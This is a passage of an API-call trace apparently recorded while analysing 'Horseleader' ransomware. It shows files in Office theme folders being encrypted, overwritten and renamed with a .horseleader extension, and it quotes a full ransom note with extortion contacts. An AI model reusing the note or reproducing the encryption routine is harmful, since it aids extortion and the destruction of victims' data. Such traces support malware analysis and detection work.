Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png.horseleader")) returned 1 [0248.212] GetProcessHeap () returned 0x780000 [0248.212] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.212] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xad0e, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 
[0248.212] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0248.212] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\#Decrypt#.txt") returned 82 [0248.212] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.213] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. 
\r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0248.213] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0248.214] lstrlenA (lpString="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") returned 1368 [0248.215] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0248.215] CloseHandle (hObject=0x158) returned 1 [0248.215] GetProcessHeap () returned 0x780000 [0248.215] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0248.215] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc24e4f00, ftCreationTime.dwHighDateTime=0x1c06b0e, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc24e4f00, ftLastWriteTime.dwHighDateTime=0x1c06b0e, nFileSizeHigh=0x0, nFileSizeLow=0x1c6c, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="THEMES.INF", cAlternateFileName="")) returned 1 [0248.215] lstrcmpiW (lpString1="THEMES.INF", lpString2="Windows") returned -1 [0248.215] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF") returned 70 [0248.215] StrStrIW (lpFirst="THEMES.INF", lpSrch=".horseleader") returned 0x0 [0248.215] lstrcmpW (lpString1="THEMES.INF", 
lpString2="#Decrypt#.txt") returned 1 [0248.215] lstrcmpW (lpString1="THEMES.INF", lpString2="_uninstalling_.png") returned 1 [0248.216] lstrlenW (lpString=".testttjffg") returned 11 [0248.216] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF", lpSrch=".testttjffg") returned 0x0 [0248.216] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0248.216] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0248.216] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\themes.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.217] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF") returned 70 [0248.217] StrStrW (lpFirst="THEMES.INF", lpSrch=".txt") returned 0x0 [0248.217] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7276) returned 1 [0248.217] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1c6c, lpOverlapped=0x0) returned 1 [0248.219] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe394, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.219] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1c6c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1c6c, lpOverlapped=0x0) returned 1 [0248.219] SetFilePointerEx (in: hFile=0x158, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.220] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0248.220] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0248.220] CloseHandle (hObject=0x158) returned 1 [0248.220] GetProcessHeap () returned 0x780000 [0248.220] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0248.220] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF.horseleader") returned 82 [0248.220] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\themes.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\themes.inf.horseleader")) returned 1 [0248.221] GetProcessHeap () returned 0x780000 [0248.221] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0248.221] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5ad387f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7084efd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7084efd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, 
cFileName="WATER", cAlternateFileName="")) returned 1 [0248.222] lstrcmpiW (lpString1="WATER", lpString2="Windows") returned -1 [0248.222] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER") returned 65 [0248.222] lstrcmpW (lpString1="WATER", lpString2=".") returned 1 [0248.222] lstrcmpW (lpString1="WATER", lpString2="..") returned 1 [0248.222] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0248.222] GetProcessHeap () returned 0x780000 [0248.222] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0248.222] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\*") returned 67 [0248.222] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5ad387f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7084efd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7084efd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0248.223] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0248.223] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\.") returned 67 [0248.223] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0248.223] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, 
ftCreationTime.dwLowDateTime=0x5ad387f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7084efd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7084efd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0248.223] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0248.223] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\..") returned 68 [0248.223] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0248.223] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0248.223] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d084c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xa6c, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0248.224] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0248.224] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 77 [0248.224] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0248.224] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0248.224] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0248.224] lstrlenW (lpString=".testttjffg") returned 11 [0248.224] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF", 
lpSrch=".testttjffg") returned 0x0 [0248.224] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.224] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.224] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.225] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 77 [0248.225] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0248.225] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=2668) returned 1 [0248.225] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0xa6c, lpOverlapped=0x0) returned 1 [0248.227] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff594, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.228] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0xa6c, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0xa6c, lpOverlapped=0x0) returned 1 [0248.228] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.228] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, 
lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.228] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.228] CloseHandle (hObject=0x1a4) returned 1 [0248.228] GetProcessHeap () returned 0x780000 [0248.228] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.228] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF.horseleader") returned 89 [0248.229] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\preview.gif.horseleader")) returned 1 [0248.229] GetProcessHeap () returned 0x780000 [0248.229] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.230] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xa5d5, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0248.230] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0248.230] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 78 [0248.230] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0248.230] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0248.230] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0248.230] lstrlenW (lpString=".testttjffg") returned 11 [0248.230] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0248.230] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.230] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.230] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.231] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 78 [0248.231] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0248.231] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=42453) returned 1 [0248.231] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.234] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 
[0248.234] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.235] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.235] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.235] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.235] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5d5, lpOverlapped=0x0) returned 1 [0248.236] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffa2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.236] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5d5, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5d5, lpOverlapped=0x0) returned 1 [0248.236] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.236] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.236] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, 
lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.236] CloseHandle (hObject=0x1a4) returned 1 [0248.236] GetProcessHeap () returned 0x780000 [0248.237] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.237] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG.horseleader") returned 90 [0248.237] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png.horseleader")) returned 1 [0248.240] GetProcessHeap () returned 0x780000 [0248.240] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.240] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36a17500, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x5e574fb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x36a17500, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0x101cc, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="WATER.ELM", cAlternateFileName="")) returned 1 [0248.240] lstrcmpiW (lpString1="WATER.ELM", lpString2="Windows") returned -1 [0248.240] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.ELM") returned 75 [0248.240] StrStrIW (lpFirst="WATER.ELM", 
lpSrch=".horseleader") returned 0x0 [0248.240] lstrcmpW (lpString1="WATER.ELM", lpString2="#Decrypt#.txt") returned 1 [0248.240] lstrcmpW (lpString1="WATER.ELM", lpString2="_uninstalling_.png") returned 1 [0248.240] lstrlenW (lpString=".testttjffg") returned 11 [0248.240] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.ELM", lpSrch=".testttjffg") returned 0x0 [0248.241] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.241] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.241] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\water.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.242] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.ELM") returned 75 [0248.242] StrStrW (lpFirst="WATER.ELM", lpSrch=".txt") returned 0x0 [0248.242] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=65996) returned 1 [0248.242] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.243] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.245] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.245] WriteFile (in: 
